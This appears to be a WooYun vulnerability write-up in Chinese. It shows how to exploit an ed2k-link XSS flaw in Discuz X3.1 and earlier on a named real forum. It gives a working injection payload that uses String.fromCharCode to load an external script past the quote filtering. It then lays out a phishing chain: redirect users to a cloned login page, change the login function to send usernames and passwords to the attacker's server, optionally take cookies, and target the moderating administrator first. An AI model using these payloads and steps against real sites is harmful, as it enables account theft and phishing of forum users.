WooYun.org

Discuzx3.1和以下的对ed2k没有进行过滤导致xss
XSS漏洞站点：叉叉助手论坛 http://bbs.xxzhushou.cn/forum.php （怪就怪你和我的外号一样╮(╯▽╰)╭）
XSS漏洞原因：ed2k协议漏洞（这个是Discuz x3.1 前版本的漏洞，再次不在赘述，百度之）
因为这个站的密码用MD5还加了盐还加了http_only标签那么我们就用钓鱼的方法实现吧。
Ok那么下面开始实战演示如何利用一个XSS漏洞进行钓鱼。
首先找到这个论坛的登陆页面
在右上角随便输入个用户名和密码就能进入登陆专用的页面：

然后审查元素把相关的资源都下载下来！
（也可以在审查元素的Network页面下刷新，就会显示出来加载的东西，然后下载就可以，如图：）

然后Dw打开html改改改改改改改改！
改的时候注意考虑一下要怎样实施钓鱼，我想到了2种方式：
1：清空原页面的东西然后加载钓鱼页面的元素
优点：地址栏地址不会变，仍在一个域名下不容易引起怀疑、
缺点：js的document没办法访问<head>标签下的元素，所以我们要把载入css啊编码啊载入js啊都写在<body>里，而且如果原页面在<head>里定义了背景那么清空<body>并重写之后样式不太好做(原谅我是第一次写html和js，大触可以无视这条)
2：xss后跳转到另一个域下的页面
优点：不需要对源码进行大改动，还原度高
缺点：地址栏里能看到跳转的地址，细心的管理员发现域名不对会留心一下。
在这里我用了第二种方式
不要说po主懒，，其实另有原因，后文中会说到。（后文2种方法都会介绍）
在考虑这两种方法之前我们先看一下这个注入点的特性：
发帖的时候包含这句：
ed2k://|file|lovely|'+想要执行的js代码+'|test/
将js代码写到加号中间就能xss：

但是中间插入的js代码不能含有各种引号，这样会闭合payload中的引号导致js不能正确执行：

如图，没有弹窗，f12一下能看到这里的情况（忘了截图就不贴了）
这个xss很鸡肋？Nonono，我们可以用html的<script>标签来利用：
<script src=http://............></scrpit>
可以看到这个方法不需要使用引号就能合法加载外部js脚本，但是直接写上面的代码的话尖括号会被转义，于是我们这样利用：
ed2k://|file|lovely|'+document.write(String.fromCharCode(这里使用ASCII码))+'|test/
在String.fromCharCode的参数里填入我们原来想要加载的payload的ASCII码，比如<script src=http://............></scrpit>这句话的ASCII码是
60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,46,46,46,46,46,46,46,46,46,46,46,46,62,60,47,115,99,114,112,105,116,62（10进制）
所以如下构造：
ed2k://|file|lovely|'+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,46,46,46,46,46,46,46,46,46,46,46,46,62,60,47,115,99,114,112,105,116,62))+'|test/
这样我们就没有使用双引号载入外部js
下面介绍下上文中2种方法的实现：
第一种：
首先吧html中<head>里加载的css、js的脚本移动到<body>中（拖到最前面，让它先加载）然后使用document.body.innerHTML()的方式将<body>标签中的元素修改为登陆页面的样式，这里就不详细介绍了。
那么我为什么放弃了这种方法呢，一个是<body>标签中的js无法直接访问<head>标签中的元素，所以不能删除背景，只能用一个白色的层遮住原来的页面。当然这只是一个问题，还有一个问题是String.fromCharCode()参数如果是中文的ASCII时可能会导致乱码，你要是做个英文版容易引起怀疑= =，不过这种方法不会跳转域名所以不容易被发现。
第二种：
在外部载入的js中利用window.location.href="http://............";的方式跳转到自己存放钓鱼页面的地址（不要问我为什么不在payload里实现，因为这个注入点不能使用各种引号= =）
然后钓鱼页面的html修改一下按钮的js：
找到注册侦听的位置：

Ok就是你了，点击后执行这个函数：

然后吧login里的内容改成把账号密码输入框内的东西发送到你的服务器就好，发送完了别让页面再跳转到论坛主页，让这次钓鱼更不会被怀疑。（跳转页面的时候一定要注意下，不要把跳转的代码接着发送写，因为如果发送没有执行完就跳转是不会发出包的，所以我们要用setTimeout(function,time);的方式延迟跳转）（我在一开始跳转到钓鱼页面的时候还让它弹了个窗说”登陆状态异常，请重新登录”，然后又传了cookie data refer等数据（这里没有用，因为不在同一个域cookie不是论坛的cookie，不过你可以在第一次跳转前就顺便发过来，这样就是论坛下的cookie了））
然后我们就能收到钓鱼页面发送来的信息了~
（如果帖子需要审核那么管理员打开帖子的时候就会触发xss，那么你第一个打到的就会是管理员的号）
贴几张测试图：
触发了XSS：

然后跳转进入了钓鱼页面：
（可以看到域名

发生了变化）
然后输入用户密码：

点击”立即登入”之后页面就向服务端发送了账号和密码并跳转回了论坛首页：

查看一下得到的信息：

Ok~就是这样~